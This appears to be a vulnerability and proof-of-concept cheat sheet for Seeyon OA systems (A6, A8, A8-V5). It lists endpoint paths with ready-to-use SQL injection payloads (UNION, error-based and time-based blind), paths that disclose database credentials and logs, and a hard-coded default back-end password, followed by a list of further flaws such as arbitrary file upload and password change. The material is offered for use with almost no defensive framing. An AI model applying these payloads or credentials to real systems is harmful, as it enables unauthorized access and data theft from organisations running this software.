A6 - SQL injection - search_result.jsp
Date: 2013
Reproduction (POC | EXP):
  /oaSearch/search_result.jsp
A6 - SQL injection - setextno.jsp
Date: 2014
Type: SQL injection
Affected scope:
Reproduction (POC | EXP):
  /ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20UnIoN%20SeLeCt%201,2,md5(1234),1%23
A6 - SQL injection - test.jsp
Date: 2015
Type: SQL injection
Affected scope:
Reproduction (POC | EXP):
  /common/js/menu/test.jsp?doType=101&S1=SeLeCt%20Md5(1234)
A6 - SQL injection - iSignatureHtmlServer.jsp
Date: 2015
Type: SQL injection
Affected scope:
Reproduction (POC | EXP):
  /HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2%27AnD%20(SeLeCt%201%20FrOm%20(SeLeCt%20CoUnT(*),CoNcaT(Md5(1234),FlOoR(RaNd(0)*2))x%20FrOm%20InFoRmAtIoN_ScHeMa.TaBlEs%20GrOuP%20By%20x)a)%23
A6 - SQL injection - messageViewer.jsp
Date: 2015
Type:
Affected scope:
Reproduction (POC | EXP):
  /ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=-1'UnIoN%20AlL%20SeLeCt%20NULL,Md5(1234),NULL,NULL%23
A6 - SQL injection - resend.jsp
Date: 2015
Type:
Affected scope:
Reproduction (POC | EXP):
  /ext/trafaxserver/SendFax/resend.jsp?fax_ids=(1)%20AnD%201=2%20UnIon%20SeLeCt%20Md5(1234)%20--
A6 - Sensitive information disclosure
Date: 2015
Type:
Affected scope:
Reproduction (POC | EXP):
  /common/selectPersonNew/initData.jsp?trueName=1
  /assess/js/initDataAssess.jsp
  /common/SelectPerson/reloadData.jsp
  /ext/trafaxserver/SystemManage/config/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
A6 - SQL injection - initData.jsp
Date: 2015
Type: SQL injection
Affected scope:
Reproduction (POC | EXP):
  /common/selectPersonNew/initData.jsp?trueName=1%25%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28sleep%286%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C1%29%29>64%20AND%20%27%25%27%3D%27
A6 - Sensitive information disclosure - Database account and password
Date: 2015
Type: Information disclosure
Affected scope:
Reproduction (POC | EXP):
  /createMysql.jsp
  /ext/createMysql.jsp
A8-V5 - Information disclosure - Log disclosure
Date: 2014
Type: Information disclosure
Reproduction (POC | EXP):
  /logs/login.log
  /seeyon/logs/login.log
  /seeyon/logs/ctp.log
  /seeyon/logs/uc.log
A8 - Default password vulnerability in the monitoring back end
Date: 2015
Type: Weak password
Reproduction (POC | EXP):
  /seeyon/management/status.jsp
  /seeyon/management/index.jsp
  /management/index.jsp
  password:WLCCYBD@SEEYON
A8 - CmxUser SQL time-based blind injection
Date: 2015
Type: Injection
Reproduction:
  /Server/CmxUser.php
Seeyon A8-V5 - Unauthorized access - /seeyon/ctp/sysmgr/monitor/cacheDump.do
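Seeyon A8-V5 - Privilege escalation - Arbitrary file upload by ordinary users
Seeyon A8-V5 - Universal password vulnerability
Seeyon A6 - SessionID disclosure vulnerability
Seeyon A6 - SQL injection with DBA privileges - /seeyon/checkWaitdo.jsp
Seeyon A6 - SQL injection - /docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1
Seeyon A6 - Information disclosure - Database information - /ext/byoa/start.jsp
Seeyon A6 - SQL injection - /ext/trafaxserver/ExtnoManage/isNotInTable.jsp
Seeyon OA 3.5 - File upload - /seeyon/fileUPload.do
Seeyon A6 - SQL injection - /ext/trafaxserver/downloadAtt.jsp?attach_ids=[sqli]
Seeyon A8-V5 - Arbitrary user password change vulnerability - /services/authorityService?wsdl
Seeyon - Sensitive information disclosure - /admin/login/user.properties
Seeyon - SQL injection - /common/js/menu/test.jsp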